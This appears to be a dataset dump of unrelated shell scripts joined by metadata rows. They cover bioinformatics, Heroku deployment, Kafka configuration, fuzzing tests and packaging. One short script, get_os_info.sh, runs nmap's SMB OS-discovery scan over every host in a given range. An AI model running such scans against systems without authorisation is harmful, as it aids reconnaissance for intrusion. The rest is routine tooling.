awk '{if ($2 != -1 || $5 != -1) print $1,$2,$3,$4,$5, $6, $7, $8, $9, $10}' > $PREFIX.hpv.bedpe
# print time
NEXTTIME2=$(date +%s)
printf "\n Finished aligning to HPV genome: \n"
# convertsecs $(($NEXTTIME2 - $NEXTTIME1))
# calculate coverage NB NEED TO WRITE/APPEND THIS TO A LOG FILE
printf "\n HPV coverage :"
HPVCOV=$($BEDTOOLS genomecov -bg -ibam $PREFIX.hpv.bam -g $GENOMESIZES |
awk '{sum+= $4} END { print sum/NR}')
printf "HPV\t$PREFIX\t$HPVCOV\n" >> $LOGFILE
# print time
NEXTTIME3=$(date +%s)
printf "\n Finished calculating HPV coverage: \n"
# convertsecs $(($NEXTTIME3 - $NEXTTIME2))
# merge the single mapped HPV and ANCHOR samples to look for bridges
join -1 7 -2 7 $PREFIX.hpv.bedpe $PREFIX.anchor.bedpe |
sort -k1,14 -k2,15 > $PREFIX.integration.bed
# print time
NEXTTIME4=$(date +%s)
printf "\n Finished integration pairs join: \n"
# convertsecs $(($NEXTTIME4 - $NEXTTIME3))
rm $PREFIX.hpv.bedpe
rm $PREFIX.anchor.bedpe
mv $PREFIX.hpv.bam $RESULTS
mv $PREFIX.integration.bed $RESULTS
printf "\n Next file?: "
done
printf "\n No, all done! \n"
rm R1.fq
rm R2.fq
rm tempsortbam
# print time
ENDTIME=$(date +%s)
#printf "\n\t Finished all work in: "
#convertsecs $(($ENDTIME - $STARTTIME))
| true |
e85d1708f8212cadbcec37ae647e11c798bfd7ac | Shell | clarkhungson/C | /Shell/8-function.sh | UTF-8 | 224 | 3.03125 | 3 | [] | no_license | #write function
#!/bin/bash
function func_B {
echo Func B.
}
function func_A {
echo $1
}
function func_D {
echo Func D.
}
function func_C {
echo $1
}
func_A "Function A."
func_B
func_C "Function C."
func_D
echo A B | true |
8212ea7f3577702dac2503c78058cef136fc3130 | Shell | jjzabkar/jjz-startup-scripts | /create-jhipster-heroku-demo.sh | UTF-8 | 5,538 | 3.40625 | 3 | [
"Apache-2.0"
] | permissive | #! /bin/sh
#
# Creates and deploys a JHipster app to Heroku.
#
# See: https://jkutner.github.io/2015/05/25/jhipster-heroku-git.html
#
HEROKU_APP_NAME=''
function installJHipsterDependencies(){
#https://jhipster.github.io/installation.html
#Assume Java
which java || (echo "java required" && exit 1 );
#Assume maven
which mvn || (echo "mvn required" && exit 1 );
#Assume Git
which git || (echo "git required" && exit 1 );
#Assume Brew
which brew || (echo "brew required" && exit 1 );
#NodeJS
brew install npm;
brew upgrade npm;
#Yeoman
npm install -g yo;
#Bower
npm install -g bower;
#Grunt
npm install -g grunt-cli
#Gulp
npm install -g gulp
#JHipster
npm install -g generator-jhipster
npm update -g generator-jhipster
#Spring boot:
brew tap pivotal/tap;
brew install springboot;
brew upgrade springboot;
};
function createJHipsterApp(){
#https://jkutner.github.io/2015/05/25/jhipster-heroku-git.html
which yo || (echo "yeoman required" && exit 1 );
#create jhipster app (prompts)
yo jhipster || exit 1 ;
#initialize git repo
git init;
#update gitignore
echo "*~" >> .gitignore ; #jedit
echo "#*#" >> .gitignore ; #jedit
echo "tmp/" >> .gitignore ;
# NOWORKY: Induces Heroku timeout errors since it lengthens the build > 60 seconds.
# echo "node_modules/" >> .gitignore; # NOWORKY ON HEROKU
echo "; Specific node_modules required to shorten Heroku build time (avoid 60s timeout)" >> .gitignore;
echo "node_modules/bower/" >> .gitignore; # 36 MB; required to shorten build time (avoid 60s timeout)
echo "node_modules/generator-jhipster/" >> .gitignore; # 65 MB; required to shorten build time (avoid 60s timeout)
echo "node_modules/grunt-browser-sync/" >> .gitignore; # 33 MB; required to shorten build time (avoid 60s timeout)
echo "node_modules/grunt-contrib-imagemin/" >> .gitignore; # 50 MB; required to shorten build time (avoid 60s timeout)
echo "node_modules/yo/" >> .gitignore; # 21 MB; required to shorten build time (avoid 60s timeout)
echo "src/main/webapp/bower_components/" >> .gitignore;
echo "target/" >> .gitignore ;
git add .gitignore;
git commit -m "Updated .gitignore with jhipster ignores";
git add node_modules/;
git commit -m "Added node_modules/ to reduce build time on destination";
git add .;
git commit -m "Created JHipster app";
} # createJHipsterApp ;
function prepareForHeroku(){
# Assume: Heroku Toolbelt
which heroku || (echo "heroku toolbelt required" && exit 1 );
# Make sure the right heroku-accounts is installed
heroku plugins:install https://github.com/heroku/heroku-accounts.git
# Assume: Heroku Account
heroku accounts || (echo "heroku account required" && exit 1 );
if [[ ! -f "./bower.json" || ! -f "./Gruntfile.js" || ! -f "./pom.xml" ]] ; then echo "createJHipsterApp required"; exit 1 ; fi ;
yo jhipster:heroku || exit 1 ; #prompts
git add .;
git commit -m "Prepared for Heroku";
#To see app name:
git remote -v;
HEROKU_APP_NAME=`git remote -v | grep heroku | cut -f 2 | sed -e 's/\.git.*//g' | sed -e 's/.*\.com.//g'`
}
XML_PROFILE='<profiles>
<profile>
<id>heroku</id>
<build>
<plugins>
<plugin>
<artifactId>maven-clean-plugin</artifactId>
<version>2.5</version>
<executions>
<execution>
<id>clean-build-artifacts</id>
<phase>install</phase>
<goals><goal>clean</goal></goals>
<configuration>
<excludeDefaultDirectories>true</excludeDefaultDirectories>
<filesets>
<fileset>
<directory>node_modules</directory>
</fileset>
<fileset>
<directory>.heroku/node</directory>
</fileset>
<fileset>
<directory>target</directory>
<excludes>
<exclude>*.war</exclude>
</excludes>
</fileset>
</filesets>
</configuration>
</execution>
</executions>
</plugin>
</plugins>
</build>
</profile>';
function updatePomXml(){
TMP_FILE=./pom.xml~;
while read LINE
do
if [ "${LINE}" == "<profiles>" ] ; then
echo "${XML_PROFILE}" >> $TMP_FILE;
else
echo "$LINE" >> $TMP_FILE;
fi
done <"./pom.xml"
rm ./pom.xml && mv $TMP_FILE ./pom.xml ;
}
function deployWithGit(){
# Check that your Git repo has the Heroku remote
git remote | grep heroku || (echo "git heroku remote required" && exit 1 );
if [ "${HEROKU_APP_NAME}" == "" ] ; then echo "HEROKU_APP_NAME required"; exit 1 ; fi ;
# Add JHipster build packs
# TODO: add " --app ${HEROKU_APP_NAME} "?
heroku buildpacks:add https://github.com/heroku/heroku-buildpack-nodejs.git
heroku buildpacks:add https://github.com/heroku/heroku-buildpack-java.git
# define the Maven options such that the correct profiles a
heroku config:set MAVEN_CUSTOM_OPTS="-Pprod,heroku -DskipTests"
# prepare the NPM configuration so that Heroku can use Bower and Grunt
npm install bower grunt-cli --save
updatePomXml ; # possible: XML CLI? brew install xmlstarlet
git add package.json pom.xml;
git commit -m "Update for Heroku Git"
git push heroku master; # takes 10-15 minutes, will time-out with error:
# Error R10 (Boot timeout) -> Web process failed to bind to $PORT within 60 seconds of launch
# Stopping process with SIGKILL
# State changed from starting to crashed
# Process exited with status 137
heroku open
} # end deployWithGit()
installJHipsterDependencies ;
createJHipsterApp ;
prepareForHeroku ;
deployWithGit ;
| true |
9765a5367365080d751fbe827ba152e4cad84a6e | Shell | utkarshabagde/BIRD_code | /smoothDC.sh | UTF-8 | 1,008 | 2.8125 | 3 | [] | no_license |
preprocessDate='2_22_14'
for covType in noGSR; do
# full/path/to/site/subject_list
subject_list=/home/data/Projects/Colibazzi/data/subClean_step2_98sub.txt
### 2. smooth the normalized derivatives
#for measure in ReHo fALFF DualRegression DegreeCentrality skewness; do
for measure in DegreeCentrality ; do
dataDir=/home/data/Projects/Colibazzi/results/CPAC_zy${preprocessDate}_reorganized/${covType}/${measure}
for sub in `cat $subject_list`; do
echo --------------------------
echo running subject ${sub}
echo --------------------------
cd ${dataDir}
if [[ ${measure} = "skewness" ]]; then
3dmerge -1blur_fwhm 6.0 -doall -prefix ${measure}_${sub}_MNI_fwhm6.nii ${measure}_${sub}_MNI.nii
elif [[ ${measure} = "DegreeCentrality" ]]; then
3dmerge -1blur_fwhm 8.0 -doall -prefix ${measure}_${sub}_MNI_fwhm8.nii ${measure}_${sub}.nii.gz
else
3dmerge -1blur_fwhm 6.0 -doall -prefix ${measure}_${sub}_MNI_fwhm6.nii ${measure}_${sub}_MNI.nii.gz
fi
done
done
done
| true |
09a98ae2d3daa56a80f5c628f0d01ea6d0c2d1c5 | Shell | magicpi/mesalink | /ci-scripts/script.sh | UTF-8 | 610 | 3.171875 | 3 | [
"BSD-3-Clause",
"ISC"
] | permissive | #!/bin/bash
set -xev
# Skip building MesaLink if testing for coverage only
if [[ "$COVERAGE" == "yes" ]]
then
exit 0
fi
if [[ x"$TARGET" == "x" ]]
then
./autogen.sh --enable-examples
else
rustup target add $RUST_TARGET
./autogen.sh --host=$TARGET --enable-rusthost=$RUST_TARGET
fi
make
make DESTDIR=$TRAVIS_BUILD_DIR/inst install-strip
du -sh $TRAVIS_BUILD_DIR/inst/usr/local/lib/libmesalink.*
# Only stable x86_64_macos and x86_64_linux builds run tests
if [[ x"$TARGET" == "x" ]]
then
./examples/client/client google.com
RUST_BACKTRACE=1 cargo test
( cd bogo && ./runme )
fi
| true |
7e9a044c2df9de4d76d9baf514ab2fd0c98a5fb1 | Shell | paulojeronimo/rh-sso-manage-users | /test-one-user.sh | UTF-8 | 1,196 | 3.703125 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -euo pipefail
cd "`dirname "$0"`"
source ./common.sh
USER_NUMBER=${USER_NUMBER:-$(( NB_OF_USERS + 1 ))}
USER_NAME=$(printf "${USER_PREFIX}-%0${LEADING_ZEROS}d" $USER_NUMBER)
TOKEN_CLIENT_ID=${TOKEN_CLIENT_ID:-$CLIENT_ID}
TOKEN_FILE=$TMP_DIR/`basename "$0" .sh`.csv
DELETE_USER=${DELETE_USER:-true}
PASSWORD=$(openssl rand -base64 16 | colrm $(( PASSWORD_SIZE + 1 )))
_delete-user() {
local user_id=$1
local proceed=$2
! $2 || echo -n "Deleting user ... "
delete-user $1 && { ! $2 || echo ok; }
}
get-TOKEN
echo -e "\nOne user test started!"
echo -n "Adding user \"$USER_NAME\" ... "
create-user $USER_NAME $PASSWORD && echo ok
user_id=`get-user-id $USER_NAME`
echo "Recovered user id: $user_id"
echo -n "Getting token for client \"$TOKEN_CLIENT_ID\" ... "
user_token=$(get-user-token $TOKEN_CLIENT_ID $USER_NAME $PASSWORD) && echo ok || {
echo "Failed to get the token!"
_delete-user $USER_NAME true
exit 1
}
echo "ID,Username,Password,Token (for $TOKEN_CLIENT_ID)" > $TOKEN_FILE
echo "$user_id,$USER_NAME,$PASSWORD,$user_token" >> $TOKEN_FILE
echo "User token saved in \"$TOKEN_FILE\"!"
_delete-user $user_id $DELETE_USER
echo "Test completed successfuly!"
| true |
17f9f59baff07b1b1411cb1e7b2f35b7a318a5b7 | Shell | Sravan13/Shell-Script | /c_kindof_for_loop.sh | UTF-8 | 120 | 2.671875 | 3 | [] | no_license | #!/usr/bin/env bash
clear
echo "we are working with loop"
for((cnt=1;cnt<=20;cnt++))
do
echo "The count is $cnt"
done
| true |
43afe784d32c507666339bde66b410cde0b796ec | Shell | lensesio/fast-data-dev | /filesystem/usr/local/share/landoop/config_kafka.sh | UTF-8 | 4,131 | 3.640625 | 4 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | function process_variable {
local var="$1"
local prefix="$2"
local config_file="$3"
# Try to detect some envs set by kubernetes and/or docker link and skip them.
if [[ $var =~ [^=]+TCP_(PORT|ADDR).* ]] \
|| [[ $var =~ [^=]+_[0-9]{1,5}_(TCP|UDP).* ]] \
|| [[ $var =~ [^=]+_SERVICE_(PORT|HOST).* ]]; then
echo "Skipping variable probably set by container supervisor: $var"
return
fi
# If _OPTS they are already exported, so continue
if [[ $var =~ ^(KAFKA|CONNECT|SCHEMA_REGISTRY|KAFKA_REST|ZOOKEEPER)_(OPTS|HEAP_OPTS|JMX_OPTS|LOG4J_OPTS|PERFORMANCE_OPTS)$ ]]; then
# export "${var}"="${!var}"
return
fi
# A special clause for zookeeper multi-server setups, in order to create myid.
if [[ $var == ZOOKEEPER_myid ]]; then
echo "${!var}" >> "$ZOOKEEPER_dataDir/myid"
return 0
fi
# Start to process configuration options
# Remove prefix from var name
conf="${var#$prefix}"
# Convert var name to lowercase except for zookeeper vars.
if [[ $prefix != ZOOKEEPER_ ]]; then
conf="${conf,,}"
fi
# Convert underscores in var name to stops
conf="${conf//_/.}"
# Convert triple underscores in var name to dashes
conf="${conf//.../-}"
# Convert double underscores in var name to underscores
conf="${conf//../_}"
echo "${conf}=${!var}" >> "$config_file"
return 0
}
# Setup Kafka
CONFIG="/var/run/broker/server.properties"
if [[ ! -f "$CONFIG" ]]; then
printenv \
| grep -E "^KAFKA_" \
| grep -vE "^KAFKA_(REST|CONNECT)_" \
| grep -vE "KAFKA_PORT" \
| sed -e 's/=.*//' \
| while read var
do
process_variable "$var" "KAFKA_" "$CONFIG"
done
# Clean empty variables
sed -r -e '/^[^=]*=\s*$/d' -i "$CONFIG"
# Allow empty variables
sed -r -e 's/(^[^=]*=)#(NULL|EMPTY)#$/\1/' -i "$CONFIG"
else
echo "Broker config found at '$CONFIG'. We won't process variables."
fi
# Setup Connect
CONFIG="/var/run/connect/connect-avro-distributed.properties"
if [[ ! -f "$CONFIG" ]]; then
printenv \
| grep -E "^CONNECT_" \
| sed -e 's/=.*//' \
| while read var
do
process_variable "$var" "CONNECT_" "$CONFIG"
done
# Clean empty variables
sed -r -e '/^[^=]*=\s*$/d' -i "$CONFIG"
# Allow empty variables
sed -r -e 's/(^[^=]*=)#(NULL|EMPTY)#$/\1/' -i "$CONFIG"
else
echo "Connect worker config found at '$CONFIG'. We won't process variables."
fi
# Setup Schema Registry
CONFIG="/var/run/schema-registry/schema-registry.properties"
if [[ ! -f "$CONFIG" ]]; then
printenv \
| grep -E "^SCHEMA_REGISTRY_" \
| sed -e 's/=.*//' \
| while read var
do
process_variable "$var" "SCHEMA_REGISTRY_" "$CONFIG"
done
# Clean empty variables
sed -r -e '/^[^=]*=\s*$/d' -i "$CONFIG"
# Allow empty variables
sed -r -e 's/(^[^=]*=)#(NULL|EMPTY)#$/\1/' -i "$CONFIG"
else
echo "Schema registry config found at '$CONFIG'. We won't process variables."
fi
# Setup REST Proxy
CONFIG="/var/run/rest-proxy/kafka-rest.properties"
if [[ ! -f "$CONFIG" ]]; then
printenv \
| grep -E "^KAFKA_REST_" \
| sed -e 's/=.*//' \
| while read var
do
process_variable "$var" "KAFKA_REST_" "$CONFIG"
done
# Clean empty variables
sed -r -e '/^[^=]*=\s*$/d' -i "$CONFIG"
# Allow empty variables
sed -r -e 's/(^[^=]*=)#(NULL|EMPTY)#$/\1/' -i "$CONFIG"
else
echo "REST Proxy config found at '$CONFIG'. We won't process variables."
fi
# Setup Zookeeper
CONFIG="/var/run/zookeeper/zookeeper.properties"
if [[ ! -f "$CONFIG" ]]; then
printenv \
| grep -E "^ZOOKEEPER_" \
| sed -e 's/=.*//' \
| while read var
do
process_variable "$var" "ZOOKEEPER_" "$CONFIG"
done
# Clean empty variables
sed -r -e '/^[^=]*=\s*$/d' -i "$CONFIG"
# Allow empty variables
sed -r -e 's/(^[^=]*=)#(NULL|EMPTY)#$/\1/' -i "$CONFIG"
else
echo "Zookeeper config found at '$CONFIG'. We won't process variables."
fi
| true |
21b2cfe1565f2376696b4b0092eace8ac5999060 | Shell | akinozgen/bin | /x9term | UTF-8 | 370 | 2.71875 | 3 | [
"MIT"
] | permissive | #!/bin/sh
#
# http://github.com/mitchweaver/bin
#
# plan9 rio style terminal drawing in X
#
# you can get my fork of xrectsel here:
# http://github.com/mitchweaver/xrectsel
#
pgrep xrectsel >/dev/null && exit 1
geom=$(xrectsel -f '%wx%h+%x+%y')
[ "$geom" ] || exit 1
exec tabbed -n ${0##*/} -d -c -g $geom -r 2 \
st -w '' -c ${0##*/} -T ${0##*/} -e ${*:-$SHELL}
| true |
5acf7f6c7a94e0134544fbc22c2135a77da2769b | Shell | W-GOULD/smbenum | /get_os_info.sh | UTF-8 | 212 | 2.953125 | 3 | [] | no_license | #!/usr/bin/env bash
target=$1
TRG=$(nmap -sL $target | grep "Nmap scan report" | awk '{print $NF}' | tr -d '()')
for i in $TRG
do
nmap -p445 -Pn -T4 --script smb-os-discovery $i -oN $i-smb-os-discovery
done | true |
4dea4e7f1934ba2e5d161b7fbde67f80b309409a | Shell | mxochitl/hedgehogs | /data_collection/run_json2mongodb.sh | UTF-8 | 258 | 3.125 | 3 | [] | no_license | echo "Uploading .json to MongoDB!"
for folder in ./fin_data/*
do
for json in ./$folder/*.json
do
IFS="/"
arr=($folder)
echo "folder: $folder"
echo "ticker: ${arr[-1]}"
echo "json:" $json
python json2mongodb.py "$json" "${arr[-1]}"
done
done
| true |
436bd49311d597758bc33b4b4dbabc362de82396 | Shell | feroult/yawp-dataflow-draft | /integration-tests/add_student.sh | UTF-8 | 260 | 2.640625 | 3 | [] | no_license | #!/bin/bash
STUDENT_ID=$1
GRADE_ID=$2
SCORE=$3
BACKEND_API=${FLOWT_API:-http://localhost:8080/api}
curl -H "Content-type: application/json" -X POST -d "{ id: '/students/$STUDENT_ID', gradeId: '/grades/$GRADE_ID', score: $SCORE }" $BACKEND_API/students; echo
| true |
b720d8b9c99936354f59129de967d0e8a5eafa57 | Shell | saltyblu/tools | /workfow-docs | UTF-8 | 2,234 | 3.859375 | 4 | [] | no_license | #!/bin/bash
workflow_file=$1
generate_inputs() {
echo "## inputs"
echo
echo "|name|description|default|required|type|"
echo "|-|-|-|-|:-|"
for var_name in $(yq '.on.workflow_call.inputs | keys' < $workflow_file); do
if [[ "$var_name" == '[' || "$var_name" == ']' ]]; then continue; fi
var="${var_name/,/}"
var="${var//\"/}"
description=$(yq ".on.workflow_call.inputs[${var_name/,/}].description" < $workflow_file)
default=$(yq ".on.workflow_call.inputs[${var_name/,/}].default" < $workflow_file)
required=$(yq ".on.workflow_call.inputs[${var_name/,/}].required" < $workflow_file)
type=$(yq ".on.workflow_call.inputs[${var_name/,/}].type" < $workflow_file)
if [[ "${description}" == "null" ]]; then description="n/a"; fi
if [[ "${default}" == "null" ]]; then default="-"; fi
if [[ "${required}" == "null" ]]; then required="false"; fi
if [[ "${type}" == "null" ]]; then type="string"; fi
echo "| \`$var\` | $description | \`${default//\"/}\` | $required |$type|"
done
echo
}
generate_secrets() {
echo "## secrets"
echo
echo "|name|description|required|"
echo "|-|-|-|"
for var_name in $(yq '.on.workflow_call.secrets | keys' < $workflow_file); do
if [[ "$var_name" == '[' || "$var_name" == ']' ]]; then continue; fi
var="${var_name/,/}"
var="${var//\"/}"
description=$(yq ".on.workflow_call.secrets[${var_name/,/}].description" < $workflow_file)
required=$(yq ".on.workflow_call.secrets[${var_name/,/}].required" < $workflow_file)
if [[ "${description}" == "null" ]]; then description="n/a"; fi
if [[ "${required}" == "null" ]]; then required="false"; fi
echo "| \`$var\` | $description | $required |"
done
echo
}
if [[ -z "$workflow_file" ]]; then
echo "no workflow_file given."
exit 1
fi
main() {
local generate="${1}"
case "$generate" in
"inputs"|"input"|"i")
generate_inputs
;;
"secrets"|"secret"|"s")
generate_secrets
;;
*)
generate_inputs
generate_secrets
;;
esac
}
main "${2:-all}"
| true |
edebe2ba77fc40f39270f77eb317491f1c3d0e78 | Shell | Arondight/loader.sh | /examples/complex/example.sh | UTF-8 | 316 | 3.21875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
RDIR=$(dirname $(readlink -f "$0"))
LOADER="${RDIR}/loader/loader.sh"
LIBDIR="${RDIR}/libs"
LIBS=($(basename -a $(find "$LIBDIR" -type f -name '*.sh' | sort)))
source "$LOADER"
load_path "$LIBDIR"
load "${LIBS[@]}"
{
echo "example.sh: here we load ${LIBS[@]}."
echo "example.sh: done."
}
| true |
e6026a040f88490223df38b27848eb8823e70000 | Shell | cesumilo/eth-keys-generator | /install-deps.sh | UTF-8 | 2,866 | 3.578125 | 4 | [] | no_license | # Author: Guillaume ROBIN <robinguillaume.pro@gmail.com>
# Date: 04/08/2017
function check_error() {
if [ "$1" != "0" ]; then
(>&2 echo -e "error($1): $2")
exit 1
fi
}
function check_os() {
gawk -F= '/^NAME/{print $2}' /etc/os-release | grep "Ubuntu"
if [ "$?" != "0" ]; then
(>&2 echo "[WARNING] This script has been tested only on Ubuntu.\nPress ENTER to continue or CTRL-C to exit.")
read
fi
}
function check_deps() {
dpkg-query -W -f='${Status}\n' build-essential | grep "^install ok"
check_error $? "build-essential package not installed.\nYou can use the following command line to solve this issue:\n\tsudo apt-get install build-essential"
dpkg-query -W -f='${Status}\n' texinfo | grep "^install ok"
check_error $? "texinfo package not installed.\nYou can use the following command line to solve this issue:\n\tsudo apt-get install texinfo"
dpkg-query -W -f='${Status}\n' openssl | grep "^install ok"
check_error $? "openssl package not installed.\nYou can use the following command line to solve this issue:\n\tsudo apt-get install openssl"
dpkg-query -W -f='${Status}\n' make | grep "^install ok"
check_error $? "openssl package not installed.\nYou can use the following command line to solve this issue:\n\tsudo apt-get install make"
}
function clean_prev_installs() {
if [ -d "./lib/include" ]; then
rm -r ./lib/include
fi
if [ -d "./lib/bin" ]; then
rm -r ./lib/bin
fi
mkdir -p lib/include
mkdir -p lib/bin
}
function install_deps() {
echo "[*] Installing auto-auto-complete."
cd lib/auto-auto-complete
make
check_error $? "something went wrong during auto-auto-complete compilation."
export PATH=$PATH:$PWD/bin
echo "[*] Installing argparser."
cd ../argparser
make c
check_error $? "something went wrong during argparser compilation."
cp bin/argparser.so ../bin/libargparser.so
echo "[*] Installing libkeccak."
cd ../libkeccak
make
check_error $? "something went wrong during libkeccak compilation."
cp bin/lib* ../bin/
echo "[*] Installation sha3sum."
cd ../sha3sum
CFLAGS="-isystem $PWD/../include" LB_LIBRARY_PATH=$PWD/../ make
check_error $? "something went wrong during sha3sum compilation."
SHA3_SUM_PATH=$PATH:$PWD/bin
}
if [ -n "$1" ] && [ "$1" = "clean" ]; then
cd lib/auto-auto-complete
make clean
cd ../argparser
make clean
cd ../libkeccak
make clean
cd ../sha3sum
make clean
exit 0
fi
echo "[*] Checking operating system."
check_os
echo "[*] Checking for dependencies."
check_deps
echo "[*] Cleaning previous installations."
clean_prev_installs
echo "[*] Installing dependencies."
install_deps
echo -e "[OK] All done.\nUse the following command line to complete the installation:\n\texport PATH=$SHA3_SUM_PATH"
| true |
e35ba1f11c6da4bcac17738cee8db1a9c0518943 | Shell | Silck-Apps/slickapps | /resources/Linux Scripts/archive/scripts_original_folder/ispconfig/data-replication/old/sites-available.sh | UTF-8 | 467 | 3.1875 | 3 | [] | no_license | dir="/etc/apache2/sites-available"
timeout=30
logfile="sites-available.log"
logdir="/var/log/ispconfig/unison/"
logpath=$logdir$logfile
servername="ispcfg"
servernumber=(${HOSTNAME: -2})
case $servernumber in
"01")
server=$servername"02"
;;
"02")
server=$servername"01"
;;
*)
esac
while [ 0 == 0 ]
do
unison -batch -auto -group -owner -terse $dir ssh://$server/$dir > $logpath
sleep $timeout
done
| true |
440e088dd0db326c16d2ce5cd3fd4acaea4bf8ae | Shell | shulifink/conjur-base-image | /phusion-ruby-builder/build.sh | UTF-8 | 552 | 3.015625 | 3 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | #!/bin/bash
cd "$(dirname "$0")"
PHUSION_VERSION=0.11
RUBY_MAJOR_VERSION=2.5
RUBY_FULL_VERSION=2.5.1
OPENSSL_BUILDER_TAG=1.0.2u-fips-2.0.16
docker pull registry.tld/phusion-ruby-builder:"$RUBY_FULL_VERSION-fips"
if [ $? -ne 0 ] || "$1"; then
docker build -t phusion-ruby-builder:"$RUBY_FULL_VERSION-fips" \
--build-arg PHUSION_VERSION="$PHUSION_VERSION" \
--build-arg RUBY_MAJOR_VERSION="$RUBY_MAJOR_VERSION" \
--build-arg RUBY_FULL_VERSION="$RUBY_FULL_VERSION" \
--build-arg OPENSSL_BUILDER_TAG="$OPENSSL_BUILDER_TAG" \
.
fi
| true |
978d4a9562e8291719465f7b5bfee56578287353 | Shell | apmarshall/dotfiles | /bin/nightly-build | UTF-8 | 548 | 3.40625 | 3 | [
"MIT"
] | permissive | #! bin/bash
# Pulls down changes for all our version controlled software from the latest builds.
# Set to 1 for more verbose output:
let verbose=0
# Find git repos and loop over them:
for repo in `find . -type d -name ".git"`
do
# cd to the dir that contains .git/:
dir=`echo ${repo} | sed -e 's/\/.git/\//'`
cd ${dir}
if (git remote -v | grep "upstream") do
git checkout nightly
git fetch upstream
git list >> $HOME/Code/nightly-review.txt
git merge upstream/master nightly
done
done
| true |
18d2ea80dca2bc659bcf25f1e5635cb339601d6a | Shell | raboserg/java-afl | /test-fuzz.sh | UTF-8 | 3,332 | 3.203125 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
#
# Copyright 2018 Jussi Judin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -xeuo pipefail
export AFL_SKIP_CPUFREQ=1
export AFL_NO_UI=1
# Enable running in Travis CI without root access:
export AFL_NO_AFFINITY=1
export AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES=1
test_timeout=10
testcase_timeout=1000+
function check_fuzz_status()
{
local mode=$1
local queue_files
queue_files=$(find out/fuzz-"$mode"/queue -type f | grep -v .state | wc -l)
if [[ "$queue_files" -lt 15 ]]; then
echo >&2 "$mode mode does not seem to provide unique paths!"
exit 1
fi
local unstable_results
unstable_results=$(
grep stability out/fuzz-"$mode"/fuzzer_stats | grep -v "100.00%" || :)
if [[ -n "${unstable_results:-}" ]]; then
echo >&2 "$mode mode was unstable: $unstable_results"
exit 1
fi
}
for mode in Forking Deferred Persistent; do
rm -rf out/fuzz-"$mode"
timeout --preserve-status -s INT "$test_timeout" \
./java-afl-fuzz -t "$testcase_timeout" -m 30000 -i in/ -o out/fuzz-"$mode" \
-- java -cp out/ins test."$mode"
check_fuzz_status "$mode"
# TODO persistent dynamic instrumentation is not 100% stable.
if [[ "$mode" == Persistent ]]; then
continue
fi
timeout --preserve-status -s INT "$test_timeout" \
./java-afl-fuzz -t "$testcase_timeout" -m 30000 -i in/ -o out/fuzz-"$mode" \
-- java -cp java-afl-run.jar:out javafl.run test."$mode"
check_fuzz_status "$mode"
done
rm -rf out/fuzz-Null
timeout --preserve-status -s INT "$test_timeout" \
./java-afl-fuzz -t "$testcase_timeout" -m 30000 -i in/ -o out/fuzz-Null \
-- java -cp out/ins test.Null
queue_files=$(find out/fuzz-Null/queue -name 'id:*' -type f | grep -v .state | wc -l)
in_files=$(find in/ -type f | wc -l)
if [[ "$queue_files" -ne "$in_files" ]]; then
echo >&2 "When input is not read, program should not create any outputs!"
exit 1
fi
rm -rf out/fuzz-Crashing
timeout --preserve-status -s INT "$test_timeout" \
./java-afl-fuzz -t "$testcase_timeout" -m 30000 -i in/ -o out/fuzz-Crashing \
-- java -cp out/ins test.Crashing
crash_files=$(find out/fuzz-Crashing/crashes -name 'id:*' -type f | grep -v .state | wc -l)
if [[ "$crash_files" -lt 1 ]]; then
echo >&2 "There definitely should be some crashes!"
exit 1
fi
rm -rf out/fuzz-Crashing
timeout --preserve-status -s INT "$test_timeout" \
./java-afl-fuzz -t "$testcase_timeout" -m 30000 -i in/ -o out/fuzz-Crashing \
-- java -cp java-afl-run.jar:out javafl.run test.Crashing
crash_files=$(find out/fuzz-Crashing/crashes -name 'id:*' -type f | grep -v .state | wc -l)
if [[ "$crash_files" -lt 1 ]]; then
echo >&2 "There definitely should be some dynamic crashes!"
exit 1
fi
| true |
dbbddd20d970056fb1de3a43547380b1483e363a | Shell | devonfw/ide | /scripts/src/test/bash/test-get-next-version | UTF-8 | 590 | 3.25 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
cd ../../../../scripts/src/main/resources || exit 1
exitcode=0
source scripts/functions
echo "Testing getNextVersion"
function doTestGetNextVersion() {
result=$(doGetNextVersion "${1}")
status="OK"
if [ "${result}" != "${2}" ]
then
status="NOK - was ${result}"
fi
echo "doGetNextVersion ${1} == ${2} ? ${status}"
}
doTestGetNextVersion 3.0.0-beta8 3.0.0-beta9
doTestGetNextVersion 3.0.0-beta01 3.0.0-beta02
doTestGetNextVersion 3.0.0-beta9 3.0.0-beta10
doTestGetNextVersion 2020.04.01 2020.04.02
doTestGetNextVersion 2020.04.001 2020.04.002
exit "${exitcode}" | true |
9c8062d5ada1eb9b821876cccb1ee062bb9b1d6b | Shell | delkyd/alfheim_linux-PKGBUILDS | /checkinstall/PKGBUILD | UTF-8 | 976 | 2.6875 | 3 | [] | no_license | # Maintainer: Nils Steinger (voidptr.de)
pkgname=checkinstall
pkgver=1.6.2
pkgrel=1
pkgdesc="Track files modified by an installation script and create a Slackware, RPM or Debian package"
arch=('i686' 'x86_64')
url="http://checkinstall.izto.org"
license=('GPL')
depends=('bash' 'glibc')
optdepends=('dpkg: to create deb packages')
makedepends=()
provides=('installwatch')
source=("http://checkinstall.izto.org/files/source/$pkgname-$pkgver.tar.gz"
"installwatch.patch"
"makefile.patch")
noextract=()
sha256sums=('dc61192cf7b8286d42c44abae6cf594ee52eafc08bfad0bea9d434b73dd593f4'
'91f99f594953c3fa1d4f6a41a7d3fa3b4a86c5187b325145336608ab49e10d32'
'46e60ae1c0b199051ac10e70dcad7dfc94508960e98885882b5d71a11fed7f0a')
prepare() {
cd "$pkgname-$pkgver"
patch -p1 -i "$srcdir/installwatch.patch"
patch -p1 -i "$srcdir/makefile.patch"
}
build() {
cd "$pkgname-$pkgver"
make
}
package() {
cd "$pkgname-$pkgver"
make PREFIX="$pkgdir/usr" install
}
